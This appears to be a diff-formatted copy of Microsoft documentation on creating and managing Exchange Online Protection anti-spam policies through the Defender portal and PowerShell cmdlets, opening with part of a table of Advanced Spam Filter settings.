-|**Object tags in HTML** (_MarkAsSpamObjectTagsInHtml_)|Messages that contain `<object>` HTML tags are marked as high confidence spam. <br><br> This tag allows plug-ins or applications to run in an HTML window.|`X-CustomSpam: Object tag in html`|
-|**Sensitive words** (MarkAsSpamSensitiveWordList_)|Microsoft maintains a dynamic but non-editable list of words that are associated with potentially offensive messages. <br><br> Messages that contain words from the sensitive word list in the subject or message body are marked as high confidence spam.|`X-CustomSpam: Sensitive word in subject/body`|
-|**SPF record: hard fail** (_MarkAsSpamSpfRecordHardFail_)|Messages sent from an IP address that isn't specified in the SPF Sender Policy Framework (SPF) record in DNS for the source email domain are marked as high confidence spam. <br><br> Test mode isn't available for this setting.|`X-CustomSpam: SPF Record Fail`|
-
-The following **Mark as spam** ASF settings set the SCL of detected messages to 6, which corresponds to a **Spam** filter verdict and the corresponding action in anti-spam policies.
-
-|Anti-spam policy setting|Description|X-header added|
-||||
-|**Sender ID filtering hard fail** (_MarkAsSpamFromAddressAuthFail_)|Messages that hard fail a conditional Sender ID check are marked as spam. <br><br> This setting combines an SPF check with a Sender ID check to help protect against message headers that contain forged senders. <br><br> Test mode isn't available for this setting.|`X-CustomSpam: SPF From Record Fail`|
-|**Backscatter** (_MarkAsSpamNdrBackscatter_)|_Backscatter_ is useless non-delivery reports (also known as NDRs or bounce messages) caused by forged senders in email messages. For more information, see [Backscatter messages and EOP](anti-spam-backscatter-about.md). <br><br> You don't need to configure this setting in the following environments, because legitimate NDRs are delivered and backscatter is marked as spam: <ul><li>Microsoft 365 organizations with Exchange Online mailboxes.</li><li>On-premises email organizations where you route _outbound_ email through EOP.</li></ul> <br><br> In standalone EOP environments that protect inbound email to on-premises mailboxes, turning this setting on or off has the following result: <ul><li> **On**: Legitimate NDRs are delivered, and backscatter is marked as spam.</li><li>**Off**: Legitimate NDRs and backscatter go through normal spam filtering. Most legitimate NDRs are delivered to the original message sender. Some, but not all backscatter is marked as spam. By definition, backscatter can be delivered only to the spoofed sender, not to the original sender.</li></ul> <br><br> Test mode isn't available for this setting.|`X-CustomSpam: Backscatter NDR`|
security Anti Spam Policies Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-spam-policies-configure.md
- Title: Configure spam filter policies
- - NOCSH
----
- - MET150
-
- - m365-security
-
-description: Admins can learn how to view, create, modify, and delete anti-spam policies in Exchange Online Protection (EOP).
- Previously updated : 1/2/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configure anti-spam policies in EOP
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, inbound email messages are automatically protected against spam by EOP. EOP uses anti-spam policies (also known as spam filter policies or content filter policies) as part of your organization's overall defense against spam. For more information, see [Anti-spam protection](anti-spam-protection-about.md).
-
-> [!TIP]
-> We recommend turning on and adding all users to the Standard and/or Strict preset security policies. For more information, see [Configure protection policies](mdo-deployment-guide.md#step-2-configure-protection-policies).
-
-The default anti-spam policy automatically applies to all recipients in the organization. For greater granularity, you can also create custom anti-spam policies that apply to specific users, groups, or domains.
-
-You can configure anti-spam policies in the Microsoft Defender portal or in PowerShell (Exchange Online PowerShell for Microsoft 365 organizations with mailboxes in Exchange Online; standalone EOP PowerShell for organizations without Exchange Online mailboxes).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Add, modify, and delete policies_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Read-only access to policies_: Membership in the **Global Reader**, **Security Reader**, or **View-Only Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- For our recommended settings for anti-spam policies, see [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings).-
- > [!TIP]
- > Settings in the default or custom anti-spam policies are ignored if a recipient is also included in the [Standard or Strict preset security policies](preset-security-policies.md). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
--- You can't completely turn off spam filtering, but you can use Exchange mail flow rules (also known as transport rules) to bypass most spam filtering on incoming messages (for example, if you route email through a third-party protection service or device before delivery to Microsoft 365). For more information, see [Use mail flow rules to set the spam confidence level (SCL) in messages](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-set-scl).
- - High confidence phishing messages are still filtered. Other features in EOP aren't affected (for example, messages are always scanned for malware).
- - If you need to bypass spam filtering for SecOps mailboxes or phishing simulations, don't use mail flow rules. For more information, see [Configure the delivery of third-party phishing simulations to users and unfiltered messages to SecOps mailboxes](advanced-delivery-policy-configure.md).
--- End-user spam notifications in anti-spam policies are replaced by _quarantine notifications_ in quarantine policies. Quarantine notifications contain information about quarantined messages for all supported protection features (not just anti-spam policy and anti-phishing policy verdicts). For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).-
-## Use the Microsoft Defender portal to create anti-spam policies
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-spam** in the **Policies** section. Or, to go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.
-
-2. On the **Anti-spam policies** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** **Create policy** and then select **Inbound** from the dropdown list to start the new anti-spam policy wizard.
-
-3. On the **Name your policy** page, configure these settings:
- - **Name**: Enter a unique, descriptive name for the policy.
- - **Description**: Enter an optional description for the policy.
-
- When you're finished on the **Name your policy** page, select **Next**.
-
-4. On the **Users, groups, and domains** page, identify the internal recipients that the policy applies to (recipient conditions):
- - **Users**: The specified mailboxes, mail users, mail contacts or mail enabled public folders.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: All recipients in the organization with a primary email address in the specified [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
-
- Click in the appropriate box, start typing a value, and then select the value that you want from the results. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users or groups, enter an asterisk (\*) by itself to see all available values.
-
- You can use a condition only once, but the condition can contain multiple values:
-
- - Multiple **values** of the **same condition** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy is applied to them.
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- - **Exclude these users, groups, and domains**: To add exceptions for the internal recipients that the policy applies to (recipient exceptions), select this option and configure the exceptions.
-
- You can use an exception only once, but the exception can contain multiple values:
-
- - Multiple **values** of the **same exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy isn't applied to them.
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
- When you're finished on the **Users, groups, and domains** page, select **Next**.
-
-5. On the **Bulk email threshold & spam properties** page, configure the following settings:
-
- - **Bulk email threshold**: Specifies the bulk complaint level (BCL) of a message that must bet met or exceeded to trigger the specified action for the **Bulk compliant level (BCL) met or exceeded** spam filtering verdict that you configure on the next page. A higher value indicates the message is less desirable (more likely to resemble spam). For more information, see [Bulk complaint level (BCL) in EOP](anti-spam-bulk-complaint-level-bcl-about.md).
-
- - **Spam properties** section:
-
- - **Increase spam score**, **Mark as spam**<sup>\*</sup> and **Test mode**: Advanced Spam Filter (ASF) settings that are turned off by default.
-
- For details about these settings, see [Advanced Spam Filter settings in EOP](anti-spam-policies-asf-settings-about.md).
-
- <sup>\*</sup> The **Contains specific languages** and **From these countries** settings aren't part of ASF.
-
- - **Contains specific languages**: Select **On** or **Off** from the dropdown list. If you turn it on, a box appears. Start typing the name of a language in the box. A filtered list of supported languages appears. When you find the language that you're looking for, select it. Repeat this step as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- - **From these countries***: Select **On** or **Off** from the dropdown list. If you turn it on, a box appears. Start typing the name of a country/region in the box. A filtered list of supported countries/regions appears. When you find the country/region that you're looking for, select it. Repeat this step as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- When you're finished on the **Bulk email threshold & spam properties** page, select **Next**.
-
-6. On the **Actions** page, configure the following settings:
-
- - **Message actions** section: Review or select the action to take on messages based on the spam filtering verdicts:
- - **Spam**
- - **High confidence spam**
- - **Phishing**
- - **High confidence phishing**
- - **Bulk compliant level (BCL) met or exceeded**
-
- The available actions for spam filtering verdicts are described in [Actions in anti-spam policies](anti-spam-protection-about.md#actions-in-anti-spam-policies).
-
- > [!TIP]
- > If the spam filtering verdict quarantines messages by default (**Quarantine message** is already selected when you get to the page), the default quarantine policy name is shown in the **Select quarantine policy** box. If you _change_ the action of a spam filtering verdict to **Quarantine message**, the **Select quarantine policy** box is blank by default. A blank value means the default quarantine policy for that verdict is used. When you later view or edit the anti-spam policy settings, the quarantine policy name is shown. For more information about the quarantine policies that are used by default for spam filter verdicts, see [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings).
- >
- > For **High confidence phishing**, the **Move message to Junk Email folder** action is effectively deprecated. Although you might be able to select the **Move message to Junk Email folder** action, high confidence phishing messages are always quarantined (equivalent to selecting **Quarantine message**).
- >
- > Users can't release their own messages that were quarantined as high confidence phishing, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined high confidence phishing messages.
-
- - **Intra-Organizational messages to take action on**: Controls whether spam filtering and the corresponding verdict actions are applied to internal messages (messages sent between users within the organization). The available values are:
- - **Default**: This is the default value. This value is the same as selecting **High confidence phishing messages**.
- - **None**
- - **High confidence phishing messages**
- - **Phishing and high confidence phishing messages**
- - **All phishing and high confidence spam messages**
- - **All phishing and spam messages**
-
- - **Retain spam in quarantine for this many days**: Specifies how long to keep the message in quarantine if you selected **Quarantine message** as the action for a spam filtering verdict. After the time period expires, the message is deleted, and isn't recoverable. A valid value is from 1 to 30 days.
-
- > [!TIP]
- > The default value is 15 days in anti-spam policies that you create in PowerShell. The default value is 30 days in anti-spam policies that you create in the Microsoft Defender portal.
- >
- > This setting also controls how long messages that were quarantined by **anti-phishing** policies are retained. For more information, see [Quarantine retention](quarantine-about.md#quarantine-retention).
-
- - **Add this X-header text**: This box is required and available only if you selected **Add X-header** as the action for a spam filtering verdict. The value you specify is the header field _name_ that's added to the message header. The header field _value_ is always `This message appears to be spam`.
-
- The maximum length is 255 characters, and the value can't contain spaces or colons (:).
-
- For example, if you enter the value `X-This-is-my-custom-header`, the X-header that's added to the message is `X-This-is-my-custom-header: This message appears to be spam.`
-
- If you enter a value that contains spaces or colons (:), the value you enter is ignored, and the default X-header is added to the message (`X-This-Is-Spam: This message appears to be spam.`).
-
- - **Prepend subject line with this text**: This box is required and available only if you selected **Prepend subject line with text** as the action for a spam filtering verdict. Enter the text to add to the beginning of the message's subject line.
-
- - **Redirect to this email address**: This box is required and available only if you selected the **Redirect message to email address** as the action for a spam filtering verdict. Enter the email address where you want to deliver the message. You can enter multiple values separated by semicolons (;).
-
- - **Safety Tips** section: By default, **Enable Safety Tips**: is selected, but you can disable Safety Tips by clearing the check box.
-
- - **Zero-hour auto purge (ZAP)** section:
-
- - **Enable zero-hour auto purge (ZAP)**: ZAP detects and takes action on messages that have already been delivered to Exchange Online mailboxes. ZAP is turned on by default. When ZAP is turned on, the following settings are available:
- - **Enable ZAP for phishing messages**: By default, ZAP is enabled for phishing detections, but you can disable it by clearing the check box. For more information, see:
- - [Zero-hour auto purge (ZAP) for phishing](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-for-phishing)
- - [Zero-hour auto purge (ZAP) for high confidence phishing](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-for-high-confidence-phishing)
- - **Enable ZAP for spam messages**: By default, ZAP is enabled for spam detections, but you can disable it by clearing the check box. For more information, [Zero-hour auto purge (ZAP) for spam](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-for-spam)see .
-
- When you're finished on the **Actions** page, select **Next**.
-
-7. On the **Allow & block list** page, you can configure message senders by email address or email domain who are allowed to skip spam filtering.
-
- In the **Allowed** section, you can configure allowed senders and allowed domains. In the **Blocked** section, you can add blocked senders and blocked domains.
-
- The maximum limit for these lists is approximately 1000 entries, but you can enter only 30 entries in the Defender portal. Use Exchange Online PowerShell to add more than 30 entries.
-
- > [!IMPORTANT]
- > The functionality of these lists has largely been replaced by the [Tenant Allow/Block List](tenant-allow-block-list-about.md). For important information, see [Allow and block list in anti-spam policies](anti-spam-protection-about.md#allow-and-block-lists-in-anti-spam-policies).
-
- The steps to add entries to any of the lists are the same:
-
- 1. Select the link for the list that you want to configure:
- - **Allowed** \> **Senders**: Select **Manage (nn) sender(s)**.
- - **Allowed** \> **Domains**: Select **Allow domains**.
- - **Blocked** \> **Senders**: Select **Manage (nn) sender(s)**.
- - **Blocked** \> **Domains**: Select **Block domains**.
-
- 2. In the flyout that opens, do the following steps:
- 1. Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add senders** or **Add domains**.
- 2. In the **Add senders** or **Add domains** flyout that opens, enter the sender's email address in the **Sender** box or the domain in the **Domain** box. As you're typing, the value appears below the box. When you're finished typing the value, select the value below the box.
- 3. Repeat the previous step as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value.
-
- When you're finished in the **Add senders** or **Add domains** flyout, select **Add senders** or **Add domains**.
-
- Back on the first flyout, the senders or domains that you added are listed.
-
- To change the list of entries from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Search** box to find entries on the flyout.
-
- To add entries, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add senders** or **Add domains** and repeat the previous steps.
-
- To remove entries, do either of the following steps:
-
- - Select one or more entries by selecting the round check box that appears in the blank area next to the sender or domain value.
- - Select all entries at once by selecting the round check box that appears in the blank area next to the column header.
-
- When you're finished on the flyout, select **Done** to return to the **Allow & block list** page.
-
- When you're finished on the **Allow & block list** page, select **Next**.
-
-8. On the **Review** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review** page, select **Create**.
-
-9. On the **New anti-spam policy created** page, you can select the links to view the policy, view anti-spam policies, and learn more about anti-spam policies.
-
- When you're finished on the **New anti-spam policy created** page, select **Done**.
-
- Back on the **Anti-spam policies** page, the new policy is listed.
-
-## Use the Microsoft Defender portal to view anti-spam policy details
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-spam** in the **Policies** section. Or, to go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.
-
-On the **Anti-spam policies** page, the following properties are displayed in the list of policies:
--- **Name**-- **Status**: Values are:
- - **Always on** for the default anti-spam policy (for example, **Anti-spam inbound policy (Default)**).
- - **On** or **Off** for other anti-spam policies.
-- **Priority**: For more information, see the [Set the priority of custom anti-spam policies](#use-the-microsoft-defender-portal-to-set-the-priority-of-custom-anti-spam-policies) section.-- **Type**: One of the following values for anti-spam policies:
- - **Protection templates** for anti-spam policies that are associated with the Standard and Strict [preset security policies](preset-security-policies.md).
- - **Custom anti-spam policy**
- - Blank for the default anti-spam policy (for example, **Anti-spam inbound policy (Default)**).
-
-To change the list of policies from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific policies.
-
-Select an anti-spam policy by clicking anywhere in the row other than the check box next to the name to open the details flyout for the policy.
-
-> [!TIP]
-> To see details about other anti-spam policies without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Use the Microsoft Defender portal to take action on anti-spam policies
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-spam** in the **Policies** section. Or, to go directly to the **Anti-spam policies** page, use <https://security.microsoft.com/antispam>.
-
-On the **Anti-spam policies** page, select the anti-spam policy from the list by clicking anywhere in the row other than the check box next to the name. Some or all following actions are available in the details flyout that opens:
--- Modify policy settings by clicking **Edit** in each section (custom policies or the default policy)-- :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** or :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** (custom policies only)-- :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** or :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** (custom policies only)-- :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** (custom policies only)--
-The actions are described in the following subsections.
-
-### Use the Microsoft Defender portal to modify anti-spam policies
-
-After you select the default anti-spam policy or a custom policy by clicking anywhere in the row other than the check box next to the name, the policy settings are shown in the details flyout that opens. Select **Edit** in each section to modify the settings within the section. For more information about the settings, see the [Create anti-spam policies](#use-the-microsoft-defender-portal-to-create-anti-spam-policies) section earlier in this article.
-
-For the default policy, you can't modify the name of the policy, and there are no recipient filters to configure (the policy applies to all recipients). But, you can modify all other settings in the policy.
-
-For the anti-spam policies named **Standard Preset Security Policy** and **Strict Preset Security Policy** that are associated with [preset security policies](preset-security-policies.md), you can't modify the policy settings in the details flyout. Instead, you select :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **View preset security policies** in the details flyout to go to the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies> to modify the preset security policies.
-
-### Use the Microsoft Defender portal to enable or disable anti-spam policies
-
-You can't disable the default anti-spam policy (it's always enabled).
-
-You can't enable or disable the anti-spam policies that are associated with Standard and Strict preset security policies. You enable or disable the Standard or Strict preset security policies on the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies>.
-
-After you select an enabled custom anti-spam policy (the **Status** value is **On**) by clicking anywhere in the row other than the check box next to the name, select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** at the top of the policy details flyout.
-
-After you select a disabled custom anti-spam policy (the **Status** value is **Off**) by clicking anywhere in the row other than the check box next to the name, select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** at the top of the policy details flyout.
-
-When you're finished in the policy details flyout, select **Close**.
-
-On the **Anti-spam policies** page, the **Status** value of the policy is now **On** or **Off**.
-
-### Use the Microsoft Defender portal to set the priority of custom anti-spam policies
-
-Anti-spam policies are processed in the order that they're displayed on the **Anti-spam policies** page:
--- The anti-spam policy named **Strict Preset Security Policy** that's associated with the Strict preset security policy is always applied first (if the Strict preset security policy is [enabled](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users)).-- The anti-spam policy named **Standard Preset Security Policy** that's associated with the Standard preset security policy is always applied next (if the Standard preset security policy is enabled).-- Custom anti-spam policies are applied next in priority order (if they're enabled):
- - A lower priority value indicates a higher priority (0 is the highest).
- - By default, a new anti-spam policy is created with a priority that's lower than the lowest existing custom anti-spam policy (the first is 0, the next is 1, etc.).
- - No two anti-spam policies can have the same priority value.
-- The default anti-spam policy always has the priority value **Lowest**, and you can't change it.-
-Anti-spam protection stops for a recipient after the first policy is applied (the highest priority policy for that recipient). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-After you select the custom anti-spam policy by clicking anywhere in the row other than the check box next to the name, you can increase or decrease the priority of the policy in the details flyout that opens:
--- The custom policy with the **Priority** value **0** on the **Anti-spam policies** page has the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** action at the top of the details flyout.-- The custom policy with the lowest priority (highest **Priority** value; for example, **3**) has the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** action at the top of the details flyout.-- If you have three or more policies, the policies between **Priority** 0 and the lowest priority have both the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** and the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** actions at the top of the details flyout.-
-When you're finished in the policy details flyout, select **Close**.
-
-Back on the **Anti-spam policies** page, the order of the policy in the list matches the updated **Priority** value.
-
-### Use the Microsoft Defender portal to remove custom anti-spam policies
-
-You can't remove the default anti-spam policy or the anti-spam policies named **Standard Preset Security Policy** and **Strict Preset Security Policy** that are associated with [preset security policies](preset-security-policies.md).
-
-After you select the custom anti-spam policy by clicking anywhere in the row other than the check box next to the name, select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** at the top of the flyout, and then select **Yes** in the warning dialog that opens.
-
-On the **Anti-spam policies** page, the deleted policy is no longer listed.
-
-## Use Exchange Online PowerShell or standalone EOP PowerShell to configure anti-spam policies
-
-In PowerShell, the basic elements of an anti-spam policy are:
--- **The spam filter policy**: Specifies the spam protections to enable or disable, the actions to apply for those protections, and other options.-- **The spam filter rule**: Specifies the priority and recipient filters (who the policy applies to) for the associated spam filter policy.-
-The difference between these two elements isn't obvious when you manage anti-spam policies in the Microsoft Defender portal:
--- When you create a policy in the Defender portal, you're actually creating a spam filter rule and the associated spam filter policy at the same time using the same name for both.-- When you modify a policy in the Defender portal, settings related to the name, priority, enabled or disabled, and recipient filters modify the spam filter rule. All other settings modify the associated spam filter policy.-- When you remove a policy in the Defender portal, the spam filter rule and the associated spam filter policy are removed at the same time.-
-In Exchange Online PowerShell, the difference between spam filter policies and spam filter rules is apparent. You manage spam filter policies by using the **\*-HostedContentFilterPolicy** cmdlets, and you manage spam filter rules by using the **\*-HostedContentFilterRule** cmdlets.
--- In PowerShell, you create the spam filter policy first, then you create the spam filter rule, which identifies the associated policy that the rule applies to.-- In PowerShell, you modify the settings in the spam filter policy and the spam filter rule separately.-- When you remove a spam filter policy from PowerShell, the corresponding spam filter rule isn't automatically removed, and vice versa.-
-A significant setting that's available only in PowerShell is the _MarkAsSpamBulkMail_ parameter that's `On` by default. The effects of this setting are explained in the [Create anti-spam policies](#use-the-microsoft-defender-portal-to-create-anti-spam-policies) section earlier in this article.
-
-### Use PowerShell to create anti-spam policies
-
-Creating an anti-spam policy in PowerShell is a two-step process:
-
-1. Create the spam filter policy.
-2. Create the spam filter rule that specifies the spam filter policy that the rule applies to.
-
-> [!NOTE]
->
-> - You can create a new spam filter rule and assign an existing, unassociated spam filter policy to it. A spam filter rule can't be associated with more than one spam filter policy.
-> - You can configure the following settings on new spam filter policies in PowerShell that aren't available in the Microsoft Defender portal until after you create the policy:
-> - Create the new policy as disabled (_Enabled_ `$false` on the **New-HostedContentFilterRule** cmdlet).
-> - Set the priority of the policy during creation (_Priority_ _\<Number\>_) on the **New-HostedContentFilterRule** cmdlet).
-> - A new spam filter policy that you create in PowerShell isn't visible in the Microsoft Defender portal until you assign the policy to a spam filter rule.
-
-#### Step 1: Use PowerShell to create a spam filter policy
-
-To create a spam filter policy, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and use this syntax:
-
-```PowerShell
-New-HostedContentFilterPolicy -Name "<PolicyName>" [-AdminDisplayName "<Comments>"] <Additional Settings>
-```
-
-This example creates a spam filter policy named Contoso Executives with the following settings:
--- Quarantine messages when the spam filtering verdict is spam or high confidence spam, and use the default quarantine policy for the quarantined messages (we aren't using the _SpamQuarantineTag_ or _HighConfidenceSpamQuarantineTag_ parameters).-- BCL 7, 8, or 9 triggers the action for a bulk email spam filtering verdict.-
-```PowerShell
-New-HostedContentFilterPolicy -Name "Contoso Executives" -HighConfidenceSpamAction Quarantine -SpamAction Quarantine -BulkThreshold 6
-```
-
-For detailed syntax and parameter information, see [New-HostedContentFilterPolicy](/powershell/module/exchange/new-hostedcontentfilterpolicy).
-
-> [!TIP]
-> For detailed instructions to specify the quarantine policy to use in a spam filter policy, see [Use PowerShell to specify the quarantine policy in anti-spam policies](quarantine-policies.md#anti-spam-policies-in-powershell).
-
-#### Step 2: Use PowerShell to create a spam filter rule
-
-To create a spam filter rule, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and use this syntax:
-
-```PowerShell
-New-HostedContentFilterRule -Name "<RuleName>" -HostedContentFilterPolicy "<PolicyName>" <Recipient filters> [<Recipient filter exceptions>] [-Comments "<OptionalComments>"]
-```
-
-This example creates a new spam filter rule named Contoso Executives with these settings:
--- The spam filter policy named Contoso Executives is associated with the rule.-- The rule applies to members of the group named Contoso Executives Group.-
-```PowerShell
-New-HostedContentFilterRule -Name "Contoso Executives" -HostedContentFilterPolicy "Contoso Executives" -SentToMemberOf "Contoso Executives Group"
-```
-
-For detailed syntax and parameter information, see [New-HostedContentFilterRule](/powershell/module/exchange/new-hostedcontentfilterrule).
-
-### Use PowerShell to view spam filter policies
-
-To return a summary list of all spam filter policies, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and run this command:
-
-```PowerShell
-Get-HostedContentFilterPolicy
-```
-
-To return detailed information about a specific spam filter policy, use this syntax:
-
-```PowerShell
-Get-HostedContentFilterPolicy -Identity "<PolicyName>" | Format-List [<Specific properties to view>]
-```
-
-This example returns all the property values for the spam filter policy named Executives.
-
-```PowerShell
-Get-HostedContentFilterPolicy -Identity "Executives" | Format-List
-```
-
-For detailed syntax and parameter information, see [Get-HostedContentFilterPolicy](/powershell/module/exchange/get-hostedcontentfilterpolicy).
-
-### Use PowerShell to view spam filter rules
-
-To view existing spam filter rules, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and use the following syntax:
-
-```PowerShell
-Get-HostedContentFilterRule [-Identity "<RuleIdentity>] [-State <Enabled | Disabled]
-```
-
-To return a summary list of all spam filter rules, run this command:
-
-```PowerShell
-Get-HostedContentFilterRule
-```
-
-To filter the list by enabled or disabled rules, run the following commands:
-
-```PowerShell
-Get-HostedContentFilterRule -State Disabled
-```
-
-```PowerShell
-Get-HostedContentFilterRule -State Enabled
-```
-
-To return detailed information about a specific spam filter rule, use this syntax:
-
-```PowerShell
-Get-HostedContentFilterRule -Identity "<RuleName>" | Format-List [<Specific properties to view>]
-```
-
-This example returns all the property values for the spam filter rule named Contoso Executives.
-
-```PowerShell
-Get-HostedContentFilterRule -Identity "Contoso Executives" | Format-List
-```
-
-For detailed syntax and parameter information, see [Get-HostedContentFilterRule](/powershell/module/exchange/get-hostedcontentfilterrule).
-
-### Use PowerShell to modify spam filter policies
-
-Other than the following items, the same settings are available when you modify a spam filter policy in PowerShell as when you create the policy as described in the [Step 1: Use PowerShell to create a spam filter policy](#step-1-use-powershell-to-create-a-spam-filter-policy) section earlier in this article.
--- The _MakeDefault_ switch that turns the specified policy into the default policy (applied to everyone, always **Lowest** priority, and you can't delete it) is only available when you modify a spam filter policy in PowerShell.-- You can't rename a spam filter policy (the **Set-HostedContentFilterPolicy** cmdlet has no _Name_ parameter). When you rename an anti-spam policy in the Microsoft Defender portal, you're only renaming the spam filter _rule_.-
-To modify a spam filter policy, [connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) and use this syntax:
-
-```PowerShell
-Set-HostedContentFilterPolicy -Identity "<PolicyName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-HostedContentFilterPolicy](/powershell/module/exchange/set-hostedcontentfilterpolicy).
-
-> [!TIP]
